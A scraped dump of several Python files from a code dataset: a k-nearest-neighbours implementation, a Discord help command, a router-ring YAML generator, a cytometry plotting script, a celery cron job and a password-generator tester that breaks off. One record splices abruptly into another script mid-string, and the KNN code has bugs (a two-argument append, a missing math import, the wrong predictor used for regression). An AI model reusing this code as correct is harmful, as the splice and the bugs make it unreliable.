进行预测,用出现过最多的类别\ndef predict_classification(train, test_row, num_neighbors):\n\tneighbors = get_neighbors(train, test_row, num_neighbors)\n\toutput_values = [row[-1] for row in neighbors]\n\t# following code may not easily understood\n\tprediction = max(set(output_values), key=output_values.count)\n\treturn prediction\n\n# 进行回归预测\ndef predict_regression(train, test_row, num_neighbors):\n\tneighbors = get_neighbors(train, test_row, num_neighbors)\n\toutput_values = [row[-1] for row in neighbors]\n\t# note should transform to float\n\tprediction = sum(output_values) / float(len(output_values))\n\treturn prediction\n\n# Abalone数据集进行分类\nfrom random import seed\nfrom random import randrange\nfrom csv import reader\n\n# load dataset\ndef load_csv(filename):\n\tdataset = []\n\twith open(filename, 'r') as file:\n\t\tcsv_reader = reader(file)\n\t\tfor row in csv_reader:\n\t\t\tif not row:\n\t\t\t\tcontinue\n\t\t\tdataset.append(row)\n\t\treturn dataset\n\n# convert string column to float\ndef str_column_to_float(dataset, column):\n\tfor row in dataset:\n\t\t# strip() 方法用于移除字符串头尾指定的字符(默认为空格)。\n\t\trow[column] = float(row[column].strip())\n\n# convert string column to integer, such as sex\ndef str_column_to_int(dataset, column):\n\tclass_values = [row[column] for row in dataset]\n\tunique = set(class_values)\n\tlookup = {}\n\t# for example, {man:0, woman:1}\n\tfor i, value in enumerate(unique):\n\t\tlookup[value] = i\n\tfor row in dataset:\n\t\trow[column] = lookup[row[column]]\n\treturn lookup\n\n# find min and max for each column\ndef dataset_minmax(dataset):\n\tminmax = []\n\t# each row represent a sample\n\tfor i in range(len(dataset[0])):\n\t\tcol_values = [row[i] for row in dataset]\n\t\tvalue_min = min(col_values)\n\t\tvalue_max = max(col_values)\n\t\tminmax.append(value_min, value_max)\n\treturn minmax\n\n# scale columns to [0,1]\ndef normalize_dataset(dataset, minmax):\n\tfor row in dataset:\n\t\tfor i in range(len(row)):\n\t\t\trow[i] = (row[i] - minmax[i][0]) / (minmax[i][1] - minmax[i][0])\n\n# split a dataset into k folds\ndef cross_validation_split(dataset, n_folds):\n\tdataset_split = []\n\tdataset_copy = list(dataset)\n\tfold_size = int(len(dataset) / n_folds)\n\tfor i in range(n_folds):\n\t\tfold = list()\n\t\twhile len(fold) < fold_size:\n\t\t\t# 可能重复选择\n\t\t\tindex = randrange(len(dataset_copy))\n\t\t\t# pop 返回弹出的元素\n\t\t\tfold.append(dataset_copy.pop(index))\n\t\tdataset_split.append(fold)\n\treturn dataset_split\n\n# 计算准确度\ndef accuracy_metric(actual, predicted):\n\tcorrect = 0\n\tfor i in range(len(actual)):\n\t\tif actual[i] == predicted[i]:\n\t\t\tcorrect += 1\n\treturn correct / float(len(actual)) * 100.0\n\n# 在交叉验证集上验证算法\ndef evaluate_algorithm(dataset, alogrithm, metric, n_folds, *args):\n\tfolds = cross_validation_split(dataset, n_folds)\n\tscores = []\n\tfor fold in folds:\n\t\ttrain_set = list(folds)\n\t\ttrain_set.remove(fold)\n\t\t# 二维的展开成一维的\n\t\ttrain_set = sum(train_set, [])\n\t\ttest_set = []\n\t\tfor row in fold:\n\t\t\trow_copy = list(row)\n\t\t\ttest_set.append(row_copy)\n\t\t\trow_copy[-1] = None\n\t\tpredicted = alogrithm(train_set, test_set, *args)\n\t\tactual = [row[-1] for row in fold]\n\t\taccuracy = metric(actual, predicted)\n\t\tscores.append(accuracy)\n\t\tprint('accuracy: ', accuracy)\n\treturn scores\n\n# KNN Algorithm\ndef k_nearest_neighbors(train, test, num_neighbors):\n\tpredicted = []\n\tfor row in test:\n\t\toutput = predict_classification(train, row, num_neighbors)\n\t\tpredicted.append(output)\n\treturn predicted\n\n# classification test\ndef classify_test():\n\tseed(1)\n\tfilename = './data/abalone.data.csv'\n\tdataset = load_csv(filename)\n\tfor i in range(1,len(dataset[0])):\n\t\tstr_column_to_float(dataset,i)\n\tstr_column_to_int(dataset, 0)\n\tn_folds = 10\n\tnum_neighbors = 10\n\tscores = evaluate_algorithm(dataset, k_nearest_neighbors, accuracy_metric, n_folds, num_neighbors)\n\tprint('Score: {}'.format(scores))\n\tprint('Mean Accuracy: %.3f%%' %(sum(scores)/float(len(scores))))\n\n# Abalone数据集进行回归\n# 计算均方误差\ndef rmse_metric(actual, predicted):\n\tsum_error = 0.0\n\tfor i in range(len(actual)):\n\t\tprediction_error = predicted[i] - actual[i]\n\t\tsum_error += (prediction_error) ** 2\n\tmean_error = sum_error / float(len(actual))\n\treturn math.sqrt(mean_error)\n\ndef k_nearest_neighbors_regression(train, test, num_neighbors):\n\tpredicted = []\n\tfor row in test:\n\t\toutput = predict_regression(train, row, num_neighbors)\n\t\tpredicted.append(output)\n\treturn predicted\n\ndef regression_test():\n\tseed(1)\n\tfilename = './data/abalone.data.csv'\n\tdataset = load_csv(filename)\n\tfor i in range(1,len(dataset[0])):\n\t\tstr_column_to_float(dataset,i)\n\tstr_column_to_int(dataset, 0)\n\tn_folds = 10\n\tnum_neighbors = 10\n\tscores = evaluate_algorithm(dataset, k_nearest_neighbors, rmse_metric, n_folds, num_neighbors)\n\tprint('Score: {}'.format(scores))\n\tprint('Mean RMSE: %.3f' %(sum(scores)/float(len(scores))))\n\n\n# simple tests\ndef test():\n\tdataset = [[2.7810836,2.550537003,0],[1.465489372,2.362125076,0],\n\t[3.396561688,4.400293529,0],[1.38807019,1.850220317,0],\n\t[3.06407232,3.005305973,0],[7.627531214,2.759262235,1],\n\t[5.332441248,2.088626775,1],[6.922596716,1.77106367,1],\n\t[8.675418651,-0.242068655,1],[7.673756466,3.508563011,1]]\n\tpredict_class = predict_classification(dataset, dataset[0], 3)\n\tprint(predict_class)\n\tpredict_regre = predict_regression(dataset, dataset[0], 3)\n\tprint(predict_regre)\n\nif __name__ == '__main__':\n\t#test()\n\t#classify_test()\n\tregression_test()\n","sub_path":"KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"269003438","text":"import json\nimport discord\nfrom discord.ext import commands\n\n\nclass CustomHelpCommand(commands.DefaultHelpCommand):\n def __init__(self, **kwargs):\n self.mod_cmds = kwargs.pop('mod_cmds')\n\n self.prefixes = \", \".join(kwargs.pop('prefixes'))\n\n super().__init__(verify_checks=False)\n\n # desc = desc, help = perms, brief = cd\n async def send_command_help(self, command):\n footer_value = \"Note: you may be able to use the command multiple times before triggering the cooldown.\\n\" \\\n \"You should get a response or see the results of your command.\"\n\n embed = discord.Embed(\n title='Command: ' + command.name,\n colour=discord.Colour.gold()\n )\n\n cd_value = 'None'\n perms = 'None'\n desc = \"No Description\"\n example = '!' + command.name\n\n if command.description:\n desc = command.description\n\n if command.brief is not None:\n brief_dict = json.loads(command.brief)\n\n example_list = brief_dict.get(\"examples\", None)\n cd = brief_dict.get('cd', None)\n\n # Replace ` with quotes\n if example_list is not None and example_list:\n example_list[:] = [s.replace('`', \"\\\"\") for s in example_list]\n example = \"\\n\".join(('!' + x for x in example_list))\n\n if example_list is not None and cd:\n cd = int(cd)\n if cd < 60:\n cd_value = str(cd) + ' second(s)'\n else:\n cd_value = str(cd//60) + ' minute(s)'\n\n if command.help is not None:\n permlist = command.help.split(', ')\n perms = \"\\n\".join(perm for perm in permlist)\n \n if command.aliases:\n aliases = \"\\n\".join(command.aliases)\n else:\n aliases = \"None\"\n\n if command.signature:\n usage_value = '!' + command.name + ' ' + command.signature + '\\n [] parameters are optional.\\n' \\\n 'If you want to give a parameter with spaces' \\\n ' use quotation marks `\"\"`'\n else:\n usage_value = '!' + command.name\n\n embed.description = desc\n embed.add_field(name='Aliases', value=aliases, inline=True)\n embed.add_field(name='Permissions (Any)', value=perms, inline=True)\n embed.add_field(name='Cooldown', value=cd_value, inline=True)\n embed.add_field(name='Usage', value=usage_value, inline=False)\n embed.add_field(name=\"Example(s)\", value=example, inline=False)\n embed.set_footer(text=footer_value)\n\n dest = self.get_destination()\n\n await dest.send(embed=embed)\n\n async def send_cog_help(self, cog):\n embed = discord.Embed(\n title=f\"Category: {cog.qualified_name}\",\n description=cog.description or \"No description\",\n colour=discord.Colour.gold()\n )\n\n sorted_commands = await self.filter_commands(cog.get_commands(), sort=True)\n\n \"\"\"\n cmd_list = []\n\n for cmd in sorted_commands:\n cmd_name = str(cmd)\n\n desc = \"\"\n\n if cmd.description:\n desc = ' - ' + cmd.description\n\n cmd_name = cmd_name + desc\n cmd_list.append(cmd_name)\n\n cmd_string = '\\n'.join(cmd_list)\n \"\"\"\n\n embed.add_field(name='Commands:', value='\\n'.join(str(cmd) + ' - !' + cmd.name + \" \" + cmd.signature for\n cmd in sorted_commands))\n\n footer = \"\"\"[] parameters are optional.\\n'If you want to give a parameter with spaces use\n quotation marks \" \" \"\"\"\n\n embed.set_footer(text=footer)\n\n dest = self.get_destination()\n\n await dest.send(embed=embed)\n\n async def send_bot_help(self, mapping):\n embed = discord.Embed(\n title=\"All categories and commands\",\n description=\"To get information on a specific command or category type\\n\"\n \"`!help -n -r -i [-h]\" % sys.argv[0])\n sys.exit(2)\n\ndef proc_dsnodes_list(_nodes_list):\n xp = []\n # 0 1 2 3 4 5 6 7 8\n # #;Ring;Site;Node;System;N-SID;SBFD ID;Aggr;OSPF Area;SDP ID\n # 1;1;AGG_KIE799;ds1-ua0799;172.25.0.1;1001;524801;kie3;210;13001\n\n rw = re.compile('^(\\s+)?(\\<|\\*+|=+|^Port|Id|\\-+|$)')\n with open(_nodes_list, \"r\") as f:\n for line in f:\n# print(\"DS LINE: {}\".format(line))\n# r = rw.search(line)\n# if not r:\n# #z = re.split(';', remove_control_chars(line.rstrip()), 10)\n z = re.split(';', str_norm(line.rstrip().lstrip()), 10)\n xp.append (z)\n return xp\n\ndef proc_rings_list(_rings_list):\n rl = []\n with open(_rings_list, \"r\") as f:\n for i, l in enumerate(f):\n if i == 0:\n continue\n# print(\"i: {}; Ring LINE: {}\".format(i, l))\n l = re.split(';', str_norm(l.rstrip().lstrip()), 13)\n rl.append (l)\n return rl\n\ndef proc_aggrs_list(_rings_list):\n al = []\n with open(_rings_list, \"r\") as f:\n for i, line in enumerate(f):\n if i == 0:\n continue\n# print(\"i: {}; Aggr LINE: {}\".format(i, line))\n# r = rw.search(line)\n# if not r:\n# #z = re.split(';', remove_control_chars(line.rstrip()), 10)\n line = re.split(';', str_norm(line.rstrip().lstrip()), 10)\n al.append (line)\n f.close()\n return al\n\ndef get_chassis(_type):\n sp = re.compile(r'7750')\n r = sp.search(_type)\n if r:\n return 7750\n sp = re.compile(r'7250')\n r = sp.search(_type)\n if r:\n return 7250\n\ndef get_timos_version(_timos):\n debug(\"Timos str in: {}\".format(_timos), debugging)\n vs = '0.0.0'; v = {}\n v['full'] = ''; v['major'] = 0; v['minor'] = 0; v['release'] = 0;\n sp = re.compile(r'[tT][iI][mM][oO][sS](?=\\-[a-zA-Z]+\\-)(\\d+)\\.(\\d+)\\.(.*)|(?!\\-[a-zA-Z]+\\-)(\\d+)\\.(\\d+)\\.(.*)')\n r = sp.search(_timos.strip('\\ '))\n if r and r.group(0):\n vs = r.group(0)\n v['full'] = vs.strip('\\ ')\n v['major'] = vs.split('.')[0]\n va = vs.split('.')\n if len(va) > 2:\n v['minor'] = va[1]\n v['release'] = va[2]\n return v\n\ndef save_yaml(_routers, out_yaml = None):\n if out_yaml is None:\n out = sys.stdout\n else:\n out = open(out_yaml, 'w')\n try:\n d = yaml.dump(_routers, out, default_flow_style=False)\n finally:\n if out_yaml is not None:\n out.close()\n\nif __name__ == '__main__':\n o = redopt()\n\n if not os.path.exists(os.path.abspath(o['aggrs'])):\n error(\"Coudn't find aggrs file \\\"{}\\\" !\".format(o['aggrs']))\n sys.exit(2)\n\n if not os.path.exists(os.path.abspath(o['rings'])):\n error(\"Coudn't find rings file \\\"{}\\\" !\".format(o['rings']))\n sys.exit(2)\n\n if not os.path.exists(os.path.abspath(o['nodes'])):\n error(\"Coudn't find nodes file \\\"{}\\\" !\".format(o['nodes']))\n sys.exit(2)\n\n# DS Node List\nnl = proc_dsnodes_list(o['nodes'])\n\n# Ring list\nrl = proc_rings_list(o['rings'])\n\n# Aggr node List\nal = proc_aggrs_list(o['aggrs'])\n\nksnodes = []\nnodes_in_a_ring = []\naggrs_in_a_ring = []\n\n# aggregators list\naggrs = []\n# Aggr routers structured data\ndaggr = {}\na_header_map = [ 'id', 'ip', 'name', 'sid', 'sbfd', 'chassis', 'sros', 'sdpid' ]\n# Convert aggr_nodes list into dict\nfor a in al:\n### 0 1 2 3 4 5 6\n### ['1', '172.16.252.1', 'sr1-kie2', '1', '524288', '7750-SR12', 'TiMOS-C-19.10.R6', 1001]\n### id system_ip name sid bfd chassis SROS sdpid\n#\n if not (a[2]):\n continue\n data = (dict(zip(a_header_map,a)))\n# daggr[a[2]] = { 'id' : a[0], 'ip' : a[1], 'sid' : a[3], 'bfd': a[4], 'chassis': a[5], 'os': a[6] }\n daggr[a[2]] = data\n debug (\"AGGR data: {}\".format(data), debugging)\nal = ''\n\n# Fill DS node routers data struct for a ring N from the DS node list\n# Parse DS nodes data\nfor i, n in enumerate(nl):\n # 0 1 2 3 4 5 6 7 8 9\n # '72', '12', 'UA0891', 'ds2-ua0891', '172.25.1.35', '4387', '525092', 'kie2', '106', '13001'\n # 'id', 'ring #', 'site', 'node', 'system_ip', 'nsid', 'sbfd', 'aggr', 'ospf_area', 'sdp_id'\n\n if i == 0:\n continue\n y = {}\n y['bfd'] = {}\n y['ospf'] = []\n y['interfaces'] = []\n y['ports'] = []\n if int(n[1]) == int(o['index']):\n if not (n[3] in nodes_in_a_ring):\n nodes_in_a_ring.append(n[3])\n xn = {n[3] : {}}\n y['bfd']['discriminator'] = int(n[6])\n #y['ospf'].append({'type' : 'nssa', 'area' : int(n[8]) })\n y['ospf'].append({ 'area' : int(n[8]) })\n y['sdp'] = int(n[9])\n y['interfaces'].append( {'name': 'system', 'sid': int(n[5]), 'ip': \"{}/32\".format(n[4]), 'vlan': None, 'port': 'system', 'ospf_area': int(n[8])} )\n ksnodes.append({n[3]: y})\n print(\"Node: {}; IP: {}\".format(n[3],n[4]))\n\nri = 0\n# Fill DS node routers data struct for the ring N from the Ring list\n# Parse ring data\nfor r in rl:\n debug(\"Ring: {}\".format(r), debugging)\n## 0 1 2 3 4 5 6 7 8 9 10 11 12\n## Ring Site # Node # Site Node Peer Port Peer port Port Media SFP Interface OSPF IP (/31)\n## ['25', '1', '1', 'KIE3', 'sr1-kie3', 'ds1-ua0747', '', ' 1/1/31', '10GBASE-LR', 'SFP+', 'ds1-ua0747_if1', '210', '172.24.0.144;']\n## ['25', '2', '2', 'UA0747', 'ds1-ua0747', 'sr1-kie3', '1/1/31', '0', '10GBASE-LR', 'SFP+', 'sr1-kie3_if1', '210', '172.24.0.145;']\n\n if int(r[0]) == int(o['index']):\n if (ri % 2) == 0:\n _srlg = \"SRLG-ACW\"\n else:\n _srlg = \"SRLG-CW\"\n if not (r[4] in nodes_in_a_ring):\n info(\"Node \\\"{}\\\" is not known: aggregator?\".format(r[4]))\n # If a node is not one of DS node check the Aggr list data\n if r[4] in daggr:\n # It is - check if it's known yet\n if r[4] not in aggrs_in_a_ring:\n # Not known -> create a base structure for a node\n y = {}\n y['bfd'] = {}\n y['ospf'] = []\n y['interfaces'] = []\n y['ports'] = []\n y['chassis'] = \"{}\".format(get_chassis(daggr[r[4]]['chassis']))\n y['timos'] = get_timos_version(daggr[r[4]]['sros'])\n y['bfd']['discriminator'] = int(daggr[r[4]]['sbfd'])\n #y['ospf'].append({'type' : 'nssa', 'area' : int(r[11]) })\n y['ospf'].append({ 'area' : int(r[11]) })\n y['ports'].append( {'port': r[6], 'peer_name': r[5], 'peer_port': r[7], 'sfp': r[9]})\n y['interfaces'].append( { 'name': 'system', 'sid': int(daggr[r[4]]['sid']), 'ip': \"{}/32\".format(daggr[r[4]]['ip']), 'vlan': None, 'port': 'system', 'ospf_area': 0 } )\n y['interfaces'].append( { 'name' : \"{}_if1\".format(r[5]), 'port': r[6], 'vlan': 1, 'ip' : \"{}/31\".format(r[12]), 'ospf_area': int(r[11]), 'srlg': _srlg} )\n # Append a ring data to a node (aggr) data struct\n aggrs.append({r[4]: y})\n aggrs_in_a_ring.append(r[4])\n else:\n warning (\"Node {} is not defined!\".format(r[4]))\n\n else:\n print(\"Node: {}: \".format(r[4]))\n #print nodes_in_a_ring.index(r[3])\n print (\"@@ {} @@\".format (ksnodes[nodes_in_a_ring.index(r[4])][r[4]]))\n ##ksnodes[nodes_in_a_ring.index(r[2])][r[2]]['ospf'].append({'type' : 'nssa', 'area' : int(n[8]) })\n # Check SFP: QSFP28?\n if r[9] == \"QSFP28\":\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['ports'].append( {'port': r[6], 'peer_name': r[5], 'peer_port': r[7], 'sfp': r[9]})\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['ports'].append( {'port': \"{}/1\".format(r[6]), 'peer_name': r[5], 'peer_port': \"{}/1\".format(r[7]), 'sfp': \"CON\"})\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['interfaces'].append( { 'name' : \"{}_if1\".format(r[5]), 'port': \"{}/1\".format(r[6]), 'vlan': 1, 'ip' : \"{}/31\".format(r[12]), 'ospf_area': int(r[11]), 'srlg': _srlg} )\n else:\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['ports'].append( {'port': r[6], 'peer_name': r[5], 'peer_port': r[7], 'sfp': r[9]})\n ksnodes[nodes_in_a_ring.index(r[4])][r[4]]['interfaces'].append( { 'name' : \"{}_if1\".format(r[5]), 'port': r[6], 'vlan': 1, 'ip' : \"{}/31\".format(r[12]), 'ospf_area': int(r[11]), 'srlg': _srlg} )\n\n ri += 1\n #print (\"Incr: {}\".format(ri))\n\n#print ksnodes\nrouters = {}\nds = { 'ds': ksnodes }\naggr = {'aggr' : {} }\n#routers = { 'ds' : ksnodes, 'aggr' : {} }\nrouters = { 'routers' : { 'ds' : ksnodes, 'aggr' : aggrs } }\n#print (routers)\n\nif 'yaml' in o:\n save_yaml(routers, o['yaml'])\nelse:\n save_yaml(routers)\n\n#vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 syntax=python\n","sub_path":"xl2ya.py","file_name":"xl2ya.py","file_ext":"py","file_size_in_byte":11077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212420524","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 12 11:44:55 2019\n\n@author: bendalllab\n\"\"\"\n####################### importing modules needed ###############################\nimport os\nimport numpy as np\nimport seaborn as sns\nsns.set()\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom statsmodels.stats.multicomp import pairwise_tukeyhsd\nfrom statsmodels.stats.multicomp import MultiComparison\n\n######################### setting working directory ###########################\ninput_path = '/Users/bendalllab/Desktop/20190327 all immune in vasculature' \noutput_path = input_path + '/all_plots'\nif not os.path.exists(output_path):\n os.makedirs(output_path) \nstat_path = input_path + '/stat_plot_cell'\nif not os.path.exists(stat_path):\n os.makedirs(stat_path) \n\ncsv_file = '/in vasculature.csv'\ncsv_path = input_path + csv_file\n\n\n#################### reading in only important rows ###########################\n#make sure the column name is set as the column index\ncsv_file = pd.read_csv(csv_path, skiprows=range(0, 7)) \n#print(csv_file)\n\n################### cleaning up column and row names ##########################\n#replace any column names with \"/\" into \"-\"\n#otherwise they won't get assigned to right directory\n\ncsv_file.columns = csv_file.columns.str.replace(\"/\", \"_\")\n\n# drop any row containing control staining rows\ncsv_file = csv_file[~csv_file[\"FCS Filename\"].str.contains(\"control\")]\n\n#replace any row names with \" \" into \"-\" and eliminate double spaces\ncsv_file[\"FCS Filename\"] = csv_file[\"FCS Filename\"].str.replace(\" \", \" \").str.replace(\"PL \", \"PL-\")\n\n#print(csv_file.head(5))\n\n\n# in new df, split the \"FCS Filename\" column into 9\nnew_df = csv_file[\"FCS Filename\"].str.split(\" \", n = 8, expand = True)\n#print(new_df.head(20))\n\n# making seperate mouse id number column \ncsv_file[\"ID\"] = new_df[3] \n \n# making seperate embryonic day column\ncsv_file[\"Embryonic_day\"] = new_df[4]\n\n# making seperate organ column\ncsv_file[\"Sample_type\"] = new_df[5] \n\n# Dropping old Name columns \ncsv_file.drop(columns =[\"FCS Filename\"], inplace = True) \n\n#drop any row containing useless info\ncsv_file = csv_file[csv_file\n .columns.drop\n (list(csv_file.filter\n (regex=\"Time|DNA|Cisplatin|length|barcode|beadDist|barium|TER-119\")))]\n#https://docs.python.org/3.4/howto/regex.html\n#https://docs.python.org/2/library/re.html#re.split\ncsv_file.columns = csv_file.columns.str.replace(\" cells\", \"_cells\").str.replace(\"dians\", \"dians_\").str.replace(\"of|[()[\\]{}]|.....Di|-bead.| \", \"\")\n\n############# create relevant lists for variables of interest #################\n#create a list of organ names\norgans = csv_file[\"Sample_type\"].dropna().unique().tolist()\n\n#list the x axis values and put them in order\ndays = csv_file[\"Embryonic_day\"].dropna().unique().tolist()\ndays.sort(key = str.lower)\n\n################### rearranging data frame to long form #######################\n#arrange dataframe in long from\nmelt_df = csv_file.melt(id_vars = ['Embryonic_day', 'ID', 'Sample_type']\n ,var_name = 'cols'\n ,value_name = 'Value')\n\n# in new df, split the \"cols\" column into 2\nn_df = melt_df['cols'].str.split(\"for|on\", n = 1, expand = True)\n# making seperate cell id column \nmelt_df[\"Markers\"] = n_df[0]\nmelt_df[\"Cell_type\"] = n_df[1]\n# Dropping old Name columns \nmelt_df.drop(columns =[\"cols\"], inplace = True)\n\n#make a list for cell type\ncell_types = melt_df[\"Cell_type\"].unique().tolist()\nmarkers = melt_df[\"Markers\"].unique().tolist()\n\n#convert percent_df to all strings\nmelt_df['Value'] = melt_df['Value'].astype(str)\n\n#get rid of NaN strings\nmelt_df = melt_df[~melt_df['Value'].str.contains(\"NaN\")]\n\n#convert Value column strings into float\nmelt_df['Value'] = melt_df['Value'].astype(float)\n\nfor cell in cell_types:\n cell_df = melt_df.loc[melt_df[\"Cell_type\"] == cell]\n for marker in markers:\n marker_df = cell_df.loc[cell_df[\"Markers\"] == marker]\n sns.set(style='white'\n , rc={'figure.figsize':(25,25)})\n sns.set_context(\"notebook\"\n ,font_scale=1.5\n ,rc={\"lines.linewidth\": 2})\n {sns.catplot(x = 'Embryonic_day'\n ,y = 'Value'\n ,hue = 'Sample_type'\n ,order = days\n ,kind = \"bar\"\n ,palette=\"muted\"\n ,ci = 68\n ,data = marker_df\n ,legend_out = True\n ,aspect = 1.6\n ,height = 5)\n .set_axis_labels(\"Embryonic days\", \"Value\")}\n sns.despine(left = True)\n plt.title(cell + \"--\" + marker, pad=50)\n plt.subplots_adjust(top = 0.7)\n \n save_file = os.path.join(output_path, '{}--{}.png'.format(cell, marker)) \n \n if save_file:\n plt.savefig(save_file)\n plt.close()\n else:\n plt.show() \n\n\"\"\"\n\n########################## trying some stats ##################################\n###############################################################################\n\n\n############################# one way anova ###################################\n\n#https://www.marsja.se/four-ways-to-conduct-one-way-anovas-using-python/#anovapy\n#http://cleverowl.uk/2015/07/01/using-one-way-anova-and-tukeys-test-to-compare-data-sets/\n\ncell_df = melt_df.loc[melt_df[\"Cell_type\"] == 'B_cells']\norgan_df = cell_df.loc[cell_df[\"Sample_type\"] == 'PB']\nmarker_df = organ_df.loc[organ_df[\"Markers\"] == '%PD-L1+']\n\nby_day_df = marker_df.groupby(\"Embryonic_day\")[\"Value\"].apply(list).apply(pd.Series)\nF, p = stats.f_oneway(by_day_df.loc['E10.5'], by_day_df.loc['E11.5'])\nprint(F,p)\n\n############################ tukey's pairwise comparison ######################\n\nsig_day_df = pd.DataFrame()\n\nfor cell in cell_types:\n cell_df = melt_df.loc[melt_df[\"Cell_type\"] == cell]\n for organ in organs:\n organ_df = cell_df.loc[cell_df[\"Sample_type\"] == organ]\n for marker in markers:\n marker_df = organ_df.loc[organ_df[\"Markers\"] == marker]\n \n #determine stat sig diff btwn medians or % pos cell types in a given organ for a given marker across embryonic days\n mc = MultiComparison(marker_df['Value'], marker_df['Embryonic_day'])\n result = mc.tukeyhsd()\n \n #print(result)\n #print(mc.groupsunique) \n \n tukey_df = pd.DataFrame(data = result._results_table.data[1:]\n ,columns = result._results_table.data[0]) \n #make a dataframe with only the value True in reject column\n true_df_csv = tukey_df.loc[tukey_df['reject'] == True]\n \n #assign columns with cell, organ, and marker names\n true_df_csv = true_df_csv.assign(marker_id = marker).assign(cell_id = cell).assign(organ_id = organ)\n #combine all true_df_csv dataframes in one dataframe\n sig_day_df = sig_day_df.append(true_df_csv, ignore_index=True)\n \n #make a dataframe with the first two columns with value True in reject column\n true_df = tukey_df.loc[tukey_df['reject'] == True].iloc[:, 0:2]\n \n for index, row in true_df.iterrows():\n truemarker_df = marker_df.loc[(marker_df['Embryonic_day'] == row['group1'])|(marker_df['Embryonic_day'] == row['group2'])]\n sns.set(style='white'\n , rc={'figure.figsize':(25,25)})\n sns.set_context(\"notebook\"\n ,font_scale=1.5\n ,rc={\"lines.linewidth\": 2})\n {sns.catplot(x = 'Embryonic_day'\n ,y = 'Value'\n ,kind = \"bar\"\n ,palette=\"muted\"\n ,ci = 68\n ,data = truemarker_df\n ,legend_out = True\n ,aspect = 1.3\n ,height = 5)\n .set_axis_labels(\"Embryonic days\"\n , \"Value\")}\n sns.despine(left = True)\n plt.title(cell+ \"--\" + organ + \"--\" + marker, pad=50)\n plt.subplots_adjust(top = 0.7)\n \n #add statistical annotation \n #https://stackoverflow.com/questions/36578458/how-does-one-insert-statistical-annotations-stars-or-p-values-into-matplotlib/37518947#37518947\n x1, x2 = 0, 1 # find column numbers\n y, h, col = truemarker_df['Value'].max() + 2, 1, 'k'\n plt.plot([x1, x1, x2, x2], [y+h, y+h, y+h, y+h], lw=1.5, c=col)\n plt.text((x1+x2)*.5, y+h, \"*\", ha='center', va='bottom', color=col)\n \n save_file = os.path.join(stat_path, '{}-{}-{}-{}-{}-stats.png'.format(row['group1'], row['group2'], organ, marker, cell)) \n \n if save_file:\n plt.savefig(save_file)\n plt.close()\n else:\n plt.show()\n\nsig_day_path = os.path.join(stat_path,'tukeys_pairwise_embryonic_day.csv')\n# output to new csv\npd.DataFrame.to_csv(sig_day_df,sig_day_path)\n\"\"\"","sub_path":"20190312_grouped bars by organ.py","file_name":"20190312_grouped bars by organ.py","file_ext":"py","file_size_in_byte":9538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"201211780","text":"#!/usr/bin/env python\n\"\"\"Run background tasks in a crontab-like system using celery beat. Celery does\nnot daemonize itself, so this script should be run in a subprocess or managed\nusing supervisor or a similar tool.\n\nSimple invocation: ::\n\n $ ./cron.py\n\nCustomizable invocation: ::\n\n celery worker -app cron --beat\n\n\"\"\"\n\nimport celery\nfrom celery.schedules import crontab\n\nimport manage\n\n\napp = celery.Celery('cron')\napp.conf.update(\n BROKER_URL='sqla+sqlite:///beat.sqlite',\n CELERY_IMPORTS=('cron', ),\n CELERYBEAT_SCHEDULE={\n 'refresh': {\n 'task': 'cron.refresh',\n 'schedule': crontab(minute=0, hour=0),\n },\n }\n)\n\n\n@app.task\ndef refresh():\n with manage.app.test_request_context():\n manage.update_aggregates()\n manage.refresh_materialized()\n\n\nif __name__ == '__main__':\n app.worker_main(['worker', '--beat'])\n","sub_path":"cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"565732882","text":"#pwdmkr pytester v2.0b3\r\nimport os\r\nimport sys \r\nsys.dont_write_bytecode = True\r\nimport argparse\r\nfrom subprocess import call as system_call\r\nfrom subprocess import check_output as check_output\r\n\r\nparser = argparse.ArgumentParser(description='Pwdmkr tester')\r\nparser.add_argument('-v', action='store_true', help='Display version and exit')\r\nparser.add_argument('-s', action='store_true', help='Save test log to file')\r\nparser.add_argument('-f', action='store', dest='file', type=str,help='Destination file to save', default='pwdmkr_test_log.txt')\r\nparser.add_argument('-n', action='store', dest='name',type=str, help='Name of tested file', default='pwdmkr.py')\r\n\t\r\nargs = parser.parse_args()\r\n\r\nclass colors:\r\n\tWHITE = '\\033[0m'\r\n\tOKBLUE = '\\033[94m'\r\n\tOKGREEN = '\\033[92m'\r\n\tWARNING = '\\033[93m'\r\n\tFAIL = '\\033[91m'\r\n\r\ntest_type = 'PY'\r\nversion = '2.0b3'\r\n\r\nc_fail = colors.WHITE + '[' + colors.FAIL + 'FAIL' + colors.WHITE + ']'\r\nc_ok = colors.WHITE + '[' + colors.OKGREEN + 'OK' + colors.WHITE + ']'\r\n\r\ntest_d = ' ' * 101\r\n\r\ndef main(name):\r\n\ttest_v = check_output(['python', name, '-v'])\r\n\tsys.stdout.write(test_v)\r\n\tif len(test_v) <= 32:\r\n\t\tprint('v' + ' ' * 11 + c_ok)\r\n\telse:\r\n\t\tprint('v' + ' ' * 9 + c_fail)\r\n\r\n\tprint('\\nmodes:')\r\n\r\n\ttest_blank = check_output(['python', name])\r\n\tsys.stdout.write(test_blank)\r\n\tif len(test_blank) == 17:\r\n\t\tprint(' ' * 12 + c_ok)\r\n\telse:\r\n\t\tprint(' ' * 10 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'l'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:l' + ' ' * 9 + c_ok)\r\n\telse:\r\n\t\tprint('m:l' + ' ' * 7 + c_fail)\r\n\r\n\ttest_m = check_output(['python', name, '-m', 'n'])\r\n\tsys.stdout.write(test_m)\r\n\tif len(test_m) == 17:\r\n\t\tprint('m:n' + ' ' * 9 + 